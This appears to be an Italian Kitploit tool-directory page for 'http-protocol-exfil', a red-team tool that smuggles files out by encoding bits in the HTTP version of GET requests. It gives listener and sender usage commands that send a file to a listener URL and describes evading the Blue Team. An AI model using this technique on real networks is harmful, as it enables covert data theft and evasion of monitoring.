Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
http-protocol-exfil — Esfiltrare file utilizzando la versione del protocollo HTTP ("HTTP/1.0" è uno 0 e "HTTP/1.1" è un 1) | Kitploit
Strumenti/GitHubGitHub/ricardojoserf/http-protocol-exfil
Esfiltrazione DatiSicurezza di Rete
GitHubricardojoserf/http-protocol-exfil

http-protocol-exfil

Esfiltrare file utilizzando la versione del protocollo HTTP ("HTTP/1.0" è uno 0 e "HTTP/1.1" è un 1)

Vedi Repository

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
24224 anni faRevisionato da Kitploit

http-protocol-exfil

Usa la versione del protocollo HTTP per inviare un file bit per bit ("HTTP/1.0" è uno 0 e "HTTP/1.1" è un 1). Utilizza richieste GET quindi il Blue Team vedrebbe solo le richieste verso il tuo indirizzo IP. Tuttavia, ci vuole molto tempo per inviare file più grandi, ad esempio serve 1 ora per inviare 200 KB, e il numero di richieste sarebbe molto alto (8 volte il numero di byte del file).

memillo

Crea listener

Per eseguire il listener usa listener.py con un argomento opzionale: la porta su cui ascoltare.

root@kitploit:~
python3 listener.py [PORT]

Esempio:

root@kitploit:~
python3 listener.py 8080

Invia un file

Per inviare un file usa sender.py con due argomenti obbligatori: il percorso del file e l'url del listener; e un argomento opzionale: il nome del file creato remotamente (se non usato, viene usato il nome del file di input).

root@kitploit:~
python3 sender.py -u URL -i INPUTFILE [-o OUTPUTFILE]

Esempio:

root@kitploit:~
python3 sender.py -u "http://127.0.0.1:8080" -i test.txt -o updated_test.txt

Esempio

Prima viene inviato il file:

image1

Se la variabile debug è impostata a True (lo è di default) puoi vedere i valori binari nei messaggi di log del listener:

image2

Il nuovo file viene creato con il contenuto del file di input:

image3


Motivazione

Penso (non ne sono sicuro) di aver letto qualcuno su Twitter che sosteneva di averlo usato per esfiltrare dati e l'idea mi è piaciuta, se sei quella persona fammi sapere.

Scarica lo strumento